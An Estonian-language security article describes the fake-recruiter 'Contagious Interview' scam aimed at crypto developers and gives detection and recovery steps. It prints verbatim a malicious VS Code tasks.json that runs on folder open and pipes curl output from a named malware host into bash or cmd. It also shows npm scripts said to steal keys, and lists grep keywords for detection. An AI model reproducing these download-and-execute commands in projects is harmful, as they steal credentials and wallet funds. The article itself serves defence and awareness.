Nakkav Intervjuu: Kuidas võltsvärbajad häkivad arendajaid

Kokkuvõte: Uus laine riiklikult toetatud rünnakuid tabab krüpto tipparendajaid. Petturid esinevad värbajate või CTO-dena ja sunnivad kandidaate avama pahatahtlikku koodi. See artikkel uurib "Martin Erazo" juhtumit, VS Code'i "tasks.json" ekspluati ja "Põletamise Protokolli", mis on vajalik ellujäämiseks.

Kohustustest loobumine: See artikkel tsiteerib küberturvalisuse intsidente, kus kasutatakse päris inimeste võltsitud identiteete. Nimed "Martin Erazo" ja "Ara Vartanian" viitavad ründajate kasutatud persoonidele. Usume, et nende nimede taga olevad päris inimesed on süütud identiteedivarguse ohvrid.

---

---

1. Täiuslik Ohver: "Martin Erazo" Persoon

See algab sõnumiga, mis vajutab Senior Arendaja jaoks kõiki õigeid nuppe:

• Roll: CTO / Lead Architect
• Eelarve: $6M tagatud rahastus
• Tehnoloogia: Web3, AI, Detsentraliseeritud Infrastruktuur

Hiljuti kinnitatud rünnakus võtab LinkedIni kaudu ühendust värbaja nimega "Martin Erazo". Profiil kasutab päris teatrilavastaja nime ja fotot, kuid tööajalugu on võlts ja muutub 2025. aastal ootamatult "IT Projektijuhtimiseks" - klassikaline märk kompromiteeritud või ostetud kontost.

Pettus areneb kiiresti. Nad jätavad vahele tüüpilise HR-sõeluuringu ja lähevad otse "Tehnilisele Intervjuule" tippjuhiga - antud juhul imiteerides päris tööstuse CTO-d Ara Vartanian (praegu Limit Break'is).

Punane Lipp: Projektide nimed muutuvad pidevalt. Värbaja müüb "Betfin"-i (GameFi platvorm), kuid saadetud esitlus on "SpaceXView" (Metaverse projekt) kohta. See ebakõla on vihje, et petturid taaskasutavad varasid kampaaniate vahel.

2. Lõks: "Kas saate meie MVP koodi üle vaadata?"

Võlts "CTO" väidab, et nad vajavad sinu ekspertsilma MVP (Minimum Viable Product) koodibaasi kontrollimiseks. Nad saadavad lingi GitHubi reposse või ZIP-faili ja survestavad sind seda avama intervjuu ajal või vahetult pärast seda.

Siin toimub häkkimine.

Nad kasutavad relvana sinu soovi aidata ja sinu ego. Sa arvad, et otsid viga Reacti komponendis. Tegelikkuses on "viga" hoopis "funktsioon", mis on loodud sinu elusäästude varastamiseks.

3. Tehniline Sissetung: Zero-Click Pahavara

Ründajad kasutavad "zero-click" või "low-click" eksploite, mis sihivad arendajate tööriistu. Rakendust pole vaja käivitada; piisab vaid kausta avamisest.

Relv: .vscode/tasks.json

Selles konkreetses juhtumis sisaldas repo nakatunud .vscode/tasks.json faili. See fail ütleb VS Code'ile, kuidas projekti ehitada.

Pahatahtlik Kood:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": See on päästik. Niipea kui avad kausta VS Code'is, käivitub see ülesanne automaatselt.
• Payload: Kasutab curli skripti allalaadimiseks aadressilt vscodesettingtask.vercel.app - tuntud pahavara host, mis maskeerub seadete API-ks.
• Tulemus: Skript töötab mälus ja varastab koheselt Chrome'i paroolid, seansi küpsised ja SSH võtmed.

Plaan B: package.json skriptid

Kui VS Code'i häkkimine ebaõnnestub, on neil npm skriptid:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

npm install või npm start käivitamine vallandab server/server.js - kohaliku C2 (Command and Control) skripti, mis lekitab keskkonnamuutujad (AWS võtmed, rahakoti seemned) ründajale.

4. Punased Lipud vs Rohelised Lipud

Kuidas seda märgata, enne kui on liiga hilja?

Kui oled arendaja, peaksid "Privaatsed Repod" (Private Repos) või ZIP-failid vallandama kõrgetasemelised häirekellad. Seaduslikud ettevõtted kasutavad Avalikke Reposid või standardiseeritud testimisplatvorme.

Hoiatus: See ei ole ainus rünnakuvektor arendajate vastu. Loe Koostööpartneri Lõksust Discordis ja kuidas Tarneahela Rünnakud muudavad sõltuvused ohtlikuks.

5. Turvaprotokoll: Kuidas turvaliselt intervjueerida

Kui oled Senior Dev, siis sind hakatakse jahtima. Oma keskkonna karastamine on kohustuslik.

Protokoll 1: "Burner" Keskkond

Ära kunagi kasuta kooditestideks oma peamist tööjaama.

• Virtuaalmasinad: Kasuta VirtualBoxi või VMWare'i.
• Pilve Dev Keskkonnad: Kasuta GitHub Codespaces või Gitpod. Need on lühiajalised ja isoleeritud sinu kohalikest rahakoti failidest.

Protokoll 2: Kohtuekspertiisi Audit

Enne võõra koodi avamist:

1. Kontrolli .vscode/tasks.json: Otsi runOn: folderOpen.
2. Kontrolli package.json: Otsi kahtlaseid preinstall või postinstall skripte.
3. Märksõnad: grep curl, wget, os.homedir(), .ssh, wallet järele.

Protokoll 3: VS Code'i Karastamine

Keela "Workspace Trust" globaalselt.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
• See sunnib VS Code'i küsima luba enne kaustataseme ülesannete käivitamist.

6. Lahendus: "Põletamise Protokoll" (Burn Protocol)

Kui avasid pahatahtliku Repo (nagu see, mille saatis "Martin Erazo" persoon), eelda, et oled kompromiteeritud. Lihtsalt lähtestamisest ei piisa.

1. Katkesta ühendus: Tõmba võrgukaabel kohe välja.
2. Põleta Rahakotid: Sinu Privaatvõtmed on lekkinud. Loo uued rahakotid puhtas seadmes (telefonis) ja liiguta allesjäänud raha. Ära kunagi kasuta vana seemet uuesti.
3. Tapa Seansid: Logi välja kõigist Google'i, GitHubi, AWS-i seanssidest. Tühista tokenid aktiivselt.
4. Kontrolli SSH Võtit: Kontrolli GitHubi/GitLabi seadeid. Ründajad lisavad sageli oma SSH võtme, et säilitada tagaukse juurdepääs. Kustuta kõik, mida sa ei tunne.
5. Tuumaplahvatus (Nuke It): Pühi ketas puhtaks ja installi OS uuesti. See on ainus viis olla 100% kindel, et Rootkitid on kadunud.

Järeldus

"Nakkav Intervjuu" pettus kasutab sinu enda ekspertiisi sinu vastu. See sihib sinu soovi lahendada probleeme. Kuid Web3-s on paranoia professionaalne voorus. Kontrolli iga identiteeti, isoleeri iga repo ja ära kunagi usalda "värbajat", kes kiirustab sind koodi käivitama.